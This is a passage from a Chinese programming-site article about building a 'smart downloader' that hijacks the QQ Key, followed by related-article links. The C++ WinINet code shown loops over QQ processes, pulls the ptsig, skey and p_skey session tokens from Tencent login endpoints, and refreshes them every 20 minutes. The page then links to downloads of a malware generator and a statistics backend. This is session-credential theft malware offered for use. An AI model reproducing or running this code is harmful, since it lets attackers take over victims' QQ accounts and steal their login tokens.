1]();InternetReadFile(hHttpRequest, lpBufferx, dwNumberOfBytesAvailablex, &dwNumberOfBytesAvailablex);// 输出 Response 数据cout << "[+] Response Data:" << lpBufferx << "\r\n" << endl;// 从返回数据中提取 ptsigx 备用char* ptsigx = lpBufferx + dwNumberOfBytesAvailablex;while (ptsigx != lpBufferx){if (strstr(ptsigx, "check_sig?")){ptsigx += sizeof("check_sig");char* pEndBuffer = strstr(ptsigx, "'");*pEndBuffer = 0;break;}ptsigx--;}// 构造 ptsigx URLCString szPtsigx = "";szPtsigx.Format(TEXT("/check_sig?%s"), ptsigx);cout << "[+] szPtsigx:" << szPtsigx << "\r\n" << endl;delete[] lpBufferx;// 读取整个HeadersZeroMemory(lpHeaderBuffer, 1024);dwSizeOfRq = 1024;HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);// 提取 skey 的值char* skey = lpHeaderBuffer + dwSizeOfRq;while (skey != lpHeaderBuffer){if (strstr(skey, "skey=")){skey += sizeof("skey");char* pEndBuffer = strstr(skey, ";");*pEndBuffer = 0;break;}skey--;}// 关闭句柄InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);cout << "[+] Skey:" << skey << "\r\n" << endl;/* 五次会话 */char *u_Ptsigx = szPtsigx.GetBuffer(szPtsigx.GetLength() + 1);szPtsigx.ReleaseBuffer();// 发送HTTPS请求hHttpSession = InternetConnectA(hInternet, "ssl.ptlogin2.weiyun.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (NULL != hHttpSession){hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", u_Ptsigx, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (NULL != hHttpRequest){bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);if (bRet){// 查询HTTP请求状态dwRetCode = 0;dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 读取整个HeadersZeroMemory(lpHeaderBuffer, 1024);dwSizeOfRq = 1024;HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);// 提取 p_skey 的值char* pskey = lpHeaderBuffer + dwSizeOfRq;while (pskey != lpHeaderBuffer){if (strstr(pskey, "p_skey=")){pskey += sizeof("p_skey");char* pEndBuffer = strstr(pskey, ";");*pEndBuffer = 0;break;}pskey--;}cout << "[+] P_skey:" << pskey << "\r\n" << endl;// 延时 20 分钟// 重新获取一遍// 每个Clientkey// 时效为 20 分钟Sleep(1200000);}}}}}}}}}}}}}}}}}}}}}InternetCloseHandle(hHttpRequest);}InternetCloseHandle(hHttpSession);}InternetCloseHandle(hInternet);}}// 延时两分钟// 继续搜索QQ进程Sleep(120000);} while (1);return 0;
}

生成器下载

Rainbow Downloader 2023 Free v1.2 生成器下载【CSDN】

Rainbow Downloader 2023 Free v1.2icon-default.png?t=N7T8https://download.csdn.net/download/qq_39190622/88374503

 Rainbow Downloader 2023 Free v1.2 生成器下载【蓝奏云】

Rainbow Downloader 2023 Free v1.2icon-default.png?t=N7T8https://wwrd.lanzoum.com/id0Bi19w53sj

  Rainbow Downloader 2023 Free v1.2 生成器下载【百度云 提取码:aw77】
​​​​​​​
Rainbow Downloader 2023 Free v1.2icon-default.png?t=N7T8https://pan.baidu.com/s/1Is3Eb0Ayk1dJn8zBIyGyyw

统计后台下载 

Rainbow Counting System 2023 Free v1.1 统计系统下载【CSDN】 

Rainbow Counting System 2023 Free v1.1icon-default.png?t=N7T8https://download.csdn.net/download/qq_39190622/88374513

 Rainbow Counting System 2023 Free v1.1 统计系统下载【蓝奏云】 

Rainbow Counting System 2023 Free v1.1icon-default.png?t=N7T8https://wwrd.lanzoum.com/iwG4M19w45ob

Rainbow Counting System 2023 Free v1.1 统计系统下载【百度云 提取码:i1fd】  ​​​​​​​
Rainbow Counting System 2023 Free v1.1icon-default.png?t=N7T8https://pan.baidu.com/s/1-VZs1-PV8ElCcBSSmqz7zA

这篇关于打造一款智能下载者 Downloader(劫持QQ Key篇)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/776789

相关文章

Python3脚本实现Excel与TXT的智能转换

Python3脚本实现Excel与TXT的智能转换

《Python3脚本实现Excel与TXT的智能转换》在数据处理的日常工作中,我们经常需要将Excel中的结构化数据转换为其他格式,本文将使用Python3实现Excel与TXT的智能转换,需要的可以... 目录场景应用:为什么需要这种转换技术解析:代码实现详解核心代码展示改进点说明实战演练:从Excel到
阅读更多...
深入理解Redis大key的危害及解决方案

深入理解Redis大key的危害及解决方案

《深入理解Redis大key的危害及解决方案》本文主要介绍了深入理解Redis大key的危害及解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着... 目录一、背景二、什么是大key三、大key评价标准四、大key 产生的原因与场景五、大key影响与危
阅读更多...
用Java打造简易计算器的实现步骤

用Java打造简易计算器的实现步骤

《用Java打造简易计算器的实现步骤》:本文主要介绍如何设计和实现一个简单的Java命令行计算器程序,该程序能够执行基本的数学运算(加、减、乘、除),文中通过代码介绍的非常详细,需要的朋友可以参考... 目录目标:一、项目概述与功能规划二、代码实现步骤三、测试与优化四、总结与收获总结目标:简单计算器,设计
阅读更多...
python 字典d[k]中key不存在的解决方案

python 字典d[k]中key不存在的解决方案

《python字典d[k]中key不存在的解决方案》本文主要介绍了在Python中处理字典键不存在时获取默认值的两种方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,... 目录defaultdict:处理找不到的键的一个选择特殊方法__missing__有时候为了方便起见,
阅读更多...
Python基于火山引擎豆包大模型搭建QQ机器人详细教程(2024年最新)

Python基于火山引擎豆包大模型搭建QQ机器人详细教程(2024年最新)

《Python基于火山引擎豆包大模型搭建QQ机器人详细教程(2024年最新)》:本文主要介绍Python基于火山引擎豆包大模型搭建QQ机器人详细的相关资料,包括开通模型、配置APIKEY鉴权和SD... 目录豆包大模型概述开通模型付费安装 SDK 环境配置 API KEY 鉴权Ark 模型接口Prompt
阅读更多...
嵌入式QT开发:构建高效智能的嵌入式系统

嵌入式QT开发:构建高效智能的嵌入式系统

摘要: 本文深入探讨了嵌入式 QT 相关的各个方面。从 QT 框架的基础架构和核心概念出发,详细阐述了其在嵌入式环境中的优势与特点。文中分析了嵌入式 QT 的开发环境搭建过程,包括交叉编译工具链的配置等关键步骤。进一步探讨了嵌入式 QT 的界面设计与开发,涵盖了从基本控件的使用到复杂界面布局的构建。同时也深入研究了信号与槽机制在嵌入式系统中的应用,以及嵌入式 QT 与硬件设备的交互,包括输入输出设
阅读更多...
让树莓派智能语音助手实现定时提醒功能

让树莓派智能语音助手实现定时提醒功能

最初的时候是想直接在rasa 的chatbot上实现,因为rasa本身是带有remindschedule模块的。不过经过一番折腾后,忽然发现,chatbot上实现的定时,语音助手不一定会有响应。因为,我目前语音助手的代码设置了长时间无应答会结束对话,这样一来,chatbot定时提醒的触发就不会被语音助手获悉。那怎么让语音助手也具有定时提醒功能呢? 我最后选择的方法是用threading.Time
阅读更多...
智能交通(二)——Spinger特刊推荐

智能交通(二)——Spinger特刊推荐

特刊征稿 01  期刊名称: Autonomous Intelligent Systems  特刊名称: Understanding the Policy Shift  with the Digital Twins in Smart  Transportation and Mobility 截止时间: 开放提交:2024年1月20日 提交截止日
阅读更多...
基于 YOLOv5 的积水检测系统:打造高效智能的智慧城市应用

基于 YOLOv5 的积水检测系统:打造高效智能的智慧城市应用

在城市发展中,积水问题日益严重,特别是在大雨过后,积水往往会影响交通甚至威胁人们的安全。通过现代计算机视觉技术,我们能够智能化地检测和识别积水区域,减少潜在危险。本文将介绍如何使用 YOLOv5 和 PyQt5 搭建一个积水检测系统,结合深度学习和直观的图形界面,为用户提供高效的解决方案。 源码地址: PyQt5+YoloV5 实现积水检测系统 预览: 项目背景
阅读更多...
pip-tools:打造可重复、可控的 Python 开发环境,解决依赖关系,让代码更稳定

pip-tools:打造可重复、可控的 Python 开发环境,解决依赖关系,让代码更稳定

在 Python 开发中,管理依赖关系是一项繁琐且容易出错的任务。手动更新依赖版本、处理冲突、确保一致性等等,都可能让开发者感到头疼。而 pip-tools 为开发者提供了一套稳定可靠的解决方案。 什么是 pip-tools? pip-tools 是一组命令行工具,旨在简化 Python 依赖关系的管理,确保项目环境的稳定性和可重复性。它主要包含两个核心工具:pip-compile 和 pip
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2